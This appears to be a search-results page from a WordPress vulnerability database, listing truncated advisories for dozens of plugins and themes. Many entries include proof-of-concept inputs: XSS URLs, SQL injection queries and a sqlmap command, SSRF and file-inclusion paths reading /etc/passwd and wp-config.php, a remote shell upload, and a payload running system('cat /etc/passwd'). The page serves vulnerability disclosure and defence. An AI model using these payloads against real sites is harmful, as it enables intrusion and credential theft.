4359 matches found
Newsletter Manager < 1.5 - Unauthenticated Open Redirect
The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header PHP function, leading to an open redirect issue In the file '/newsletter-manager/confirmation.php': 33: $xyzemurl = base64decode$GET'appurl'; ... 179:...
W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar
The implementation of opcacheflushfile calls fileexists with a parameter fully controlled by the user. curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flushfile&file=ftp://y.y.y.y:zzzz/' Note: The nonce value is given ...
W3 Total Cache <= 0.9.7.3 - Cross-Site Scripting (XSS)
The W3 Total Cache WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. alert1"...
Travel Booking < 2.7.8.4 - Reflected & Stored XSS
Weak security measures like no input & textarea fields data filtering has been discovered in the 'Traveler - Travel Booking WordPress Theme'. Special Notes: 1 - 'Change Avatar' upload field works really strange. F.e., u can upload any .PHP file with extension .php.png and break profile page Serve...
Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting (XSS)
The Blog Designer WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. Send POST request to: /wp-admin/admin-ajax.php?action=save&updated=true With request body: customcss=confirm1...
Share This Image <= 1.19 - Stored XSS
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered Go to the Share This Image menu, and put " in the Selector field from the "What to Share" secti...
My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)
Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. http://www.domain.de/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%2FOPENBUGBOUNTY%2F%3E...
JobCareer < 2.5.1 - Authenticated Stored Cross-Site Scripting
Bad input fields data filtering has been discovered in the 'JobCareer | Job Board Responsive WordPress Theme'. http://jobcareer.chimpgroup.com/candidate/asdasdasdasdasd/ Register a new account on the demo website: http://jobcareer.chimpgroup.com/ , then go to the «Resume» profile tab:...
CarSpot Theme <= 2.1.6 - Authenticated Stored XSS
Bad input field data filtering has been discovered in the 'CarSpot – Automotive Car Dealer Wordpress Classified Theme'. Current version of this Premium Theme is 2.1.5. Authorize on the demo website for tests: https://carspot.scriptsbundle.com/, login is [email protected] and passowrd i...
Download Manager <= 2.9.93 - Authenticated Cross-Site Scripting (XSS)
In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publishdate . By adding parameter " and add any XSS payload , the xss payload will execute. To...
WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection
The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue. curl -k --silent "http://example.com/index.php?restroute=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=fields=3D+from+wpusers+--+-"...
Social Media & Share Icons <= 2.1.7 - Multiple Issues
The Social Media Share Buttons & Social Sharing Icons WordPress plugin was affected by a Multiple Issues security vulnerability. https://plugins.trac.wordpress.org/browser/ultimate-social-media-icons/tags/2.1.7/libs/controllers/sfsibuttonscontroller.phpL877...
Loco Translate < 2.2.2 - Authenticated LFI
WordPress plugin Loco Translate version appears to have an Authenticated LFI Vulnerability under the 'Edit Template' Functionality. The following vulnerability can be exploited by any user with access to the plugin access can range from Admin to Subscriber WPScanTeam Note: Was not able to reprodu...
Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
Unauthenticated remote code execution has been discovered in functionality that handles settings import. 1. Create payload file and host it on a location accessible by a targeted website. Payload content : "system'cat /etc/passwd'" 2. Visit...
Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update
Description The library, used in numerous plugins, does not have proper authorisation when updating blog options, allowing any authenticated users, such as subscriber to update arbitrary options As any authenticated user: Enable new user registrations:...
Ultimate Membership Pro <= 7.5 - Arbitrary media upload
The ajax-upload.php endpoint doesn't check for the current user's capabilities or that they are even logged in, so we can do a few things we shouldn't be able to do: Without any credentials, you can simply POST the image file in the field ihcfile and it'll store it for you: $ curl -F...
Ultimate Membership Pro 7.4.2 <= 7.5 - Arbitrary media include
In addition to cropping/rotating/resizing an image of your choosing, you can abuse the imgUrl feature on versions that it's available on 7.4.2+ at least to make an HTTP request to any site you want. For example, by having it connect to a site you control, you can determine the IP address of the...
Advanced Custom Fields <= 5.7.10 - Unserialize of user input
Multiple maybeunserialize calls result with unserialize of user input. Low priviledged users as contributors, but in many cases visitors too https://medium.com/websec/wordpress-acf-5-7-10-unserialize-of-user-input-ac17cc473e0d...
Quiz And Survey Master < 6.2.2 - Authenticated Cross-Site Scripting (XSS)
The Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://example.com/wp-admin/admin.php?page=mlwquizresults&quizid=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E...
Contact Form Email <= 1.2.65 - Multiple Cross-Site Scripting (XSS) & CSRF
The Contact Form Email WordPress plugin was affected by a Multiple Cross-Site Scripting XSS & CSRF security vulnerability. http://www.example.com/wp-admin/admin.php?page=cpcontactformtoemail&edit=1&cal=1&item='"...
Blog2Social <= 5.0.2 - Authenticated Cross-Site Scripting (XSS)
The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://example.com/wp-admin/admin.php?page=blog2social-ship&postId=70&b2saction=1&b2supdatepublishdate='"...
User Registration <= 1.5.5 - Authenticated Cross-Site Scripting (XSS)
The User Registration – Custom Registration Form, Login And User Profile For WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability...
MapSVG Lite <= 3.2.3 - Cross-Site Request Forgery (CSRF)
CSRF in the mapsvgsave AJAX method...
JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)
The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert/xss/%3C/script%3E&mimetype=text/html;%20charset=utf-8...
JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)
The jsmol2wp WordPress plugin was affected by an Unauthenticated Server Side Request Forgery SSRF security vulnerability. http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php...
WP AutoSuggest 0.24 - Unauthenticated SQL Injection
The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability. sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpasaction=query&wpaskeys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpaskeys --tamper space2comment...
Master Slider <= 3.7.0 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin does not properly sanitise the slider name when creating or editing a slider, leading to an Authenticated editor+ Stored Cross-Site Scripting issue which will be triggered in the Slider table /wp-admin/admin.php?page=master-slider. Edit WPScanTeam: - The original report was from 2018,...
WP GDPR Compliance <= 1.4.2 - Unauthenticated Call Any Action or Update Any Option
The plugin WP GDPR Compliance allows unauthenticated users to execute any action and to update any database value. If the request data form is available for unauthenticated users, even unauthenticated users are able to do this. See references for discussion of the issue. The problem is in the fil...
Better WordPress reCAPTCHA <= 2.0.3 - Unauthenticated Cross-Site Scripting (XSS)
There is a reflected XSS vulnerability in Better WordPress reCAPTCHA plugin version 2.0.3, and possibly below. The parameter cerror value is reflected in the page when this plugin is enabled. Once plugin disabled, the "cerror" parameter's value is not reflected in the page anymore. This is the HT...
Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities
Following the PoC you can combine the vulnerabilities to obtain PHP code execution and read sensitive file. By default the File Manager can only be used by Administrator users, however, any user role can be configured to use it. Diretory Trasversal: POST /wordpress/wp-admin/admin-ajax.php HTTP/1....
Calendar <= 1.3.10 - Authenticated Stored Cross-Site Scripting (XSS)
This WordPress plugin allows remote authenticated users, without the unfilteredhtml capability, to execute JavaScript code through stored XSS attack. The plugin by default is available to users with contributor or more privileges. POC 1 You can inject JavaScript code into the event title when...
Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Cross-Site Scripting (XSS)
Cross-Site Scripting XSS vulnerability in the JSON output by modifying the hash parameter in admin-ajax.php using the fetchposts action. Response Content-Type set to html. http://www.example.com/wp-admin/admin-ajax.php?action=fetchposts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert1%3E...
Pie Register <= 3.0.17 - Unauthenticated Cross-Site Scripting (XSS)
The Pie Register – User Registration Forms. Invitation based registrations, Custom Login, Payments WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. ttp://www.website.com/wordpress/index.php/forgot-password/?"alert1...
Tajer - Unauthenticated Arbitrary File Upload
The tajer WordPress plugin was affected by an Unauthenticated Arbitrary File Upload security vulnerability. curl -F "[email protected]" http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php Shell is uploaded to:...
WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Windows NT 6.1...
Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass
The Wordfence Security – Firewall & Malware Scan WordPress plugin was affected by an Username Enumeration Prevention Bypass security vulnerability. Wordfence blocks: http://www.example.com/?author=1 But allowed: http://www.example.com/?author=1...
Breadcrumb NavXT <= 6.1.0 - Username Disclosure via REST API
The Breadcrumb NavXT WordPress plugin was affected by an Username Disclosure via REST API security vulnerability. http://www.example.com/wp-json/bcn/v1/author/1...
Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion
This bug was found in the file: /wechat-broadcast/wechat/Image.php echo filegetcontentsisset$GET"url" ? $GET"url" : ''; The parameter "url" it is not sanitized allowing include local or remote files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact...
Localize My Post 1.0 - Unauthenticated Local File Inclusion (LFI)
The localize-my-post WordPress plugin was affected by an Unauthenticated Local File Inclusion LFI security vulnerability. http://www.example.com/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd...
File Manager < 3.1 - CSRF to Stored Cross-Site Scripting
The plugin is lacking CSRF as well as sanitisation checks, allowing attackers to perform CSRF attacks against logged in administrators and set an XSS payload in the publicpath setting...
File Manager < 3.0 - Authenticated Reflected Cross-Site Scripting (XSS)
Lack of sanitisation in the lang parameter in the admin dashboard could allow attacker to perform reflected XSS attacks against logged in administrators https://example.com/wp-admin/admin.php?page=wpfilemanager&lang=zhCNalertXSS...
Duplicator <= 1.2.40 - Unauthenticated Arbitrary Code Execution
If installer files, installer.php and installer-backup.php, are not removed by the administrators, a code injection during the database setup step allows to execute arbitrary code on the server. actionajax=3&actionstep=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=test';...
Image Intense <= 3.2.5 - Authenticated SQL Injection in shortcodes
The vendor does not consider it to be a vulnerability, it remains unfixed. SQL Injection in handling of the "etpbimagen10s" shortcode. The last version at the time of the original advisory, 3.2.5, is known to be affected. etpbsection bbbuilt="1"etpbrowetpbcolumn type="44"etpbimagen10s...
UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)
An XSS vulnerability that affects from version 2.13 to 4.9.23. POST /wp-admin/admin-ajax.php Host: domain.com action=userproshortcodetemplate&shortcode=userpro id=1 layout="float" collageperpage="20" emdpaginatetop="1" emdpaginate="1" emdgender="Gender,radi...
Gift Voucher <= 4.1.1 - Unauthenticated Blind SQL Injection
The wpgvdoajaxfronttemplate AJAX action both authenticated and unauthenticated, defined in the front.php does not sanitised, validate or escape the templateid parameter before using it in a SQL statement, leading to a SQL Injection issue. This has been present since at least 1.0.5 v4.1.0 tried to...
Supreme Directory Theme <= 1.1.8 - Unauthenticated Cross-Site Scripting (XSS)
This theme has a parameter, s, that allows execute a xss payload: " 1. Install the theme 2. Access the web on another browser 3. Write this uri: website.com/?s="alert0...
Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection
WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. Technical details: Chained Quiz appears to be vulnerable to time-based SQL-Injection. The issue lies on the "$answer" backend variable...
Export Users to CSV <= 1.1.1 - CSV Injection
WordPress Export users to CSV plugin version 1.1.1. and before are affected by Remote Code Execution through the CSV injection vulnerability. This allows an application user to inject commands as part of the fields of his profile and these commands are executed when a user with greater privilege...
Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS
WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks. This issue can be exploited by unauthenticated attackers, by the use of CSRF, for example. The following parameters are vulnerable in fwsenddata function: fwdataid1 fwdataid...
All In One Favicon <= 4.6 - Multiple Stored Authenticated XSS
Authenticated Stored Cross-Site Scripting XSS in 8 parameters: backendApple-Text backendGIF-Text backendICO-Text backendPNG-Text frontendApple-Text frontendGIF-Text frontendICO-Text frontendPNG-Text " "...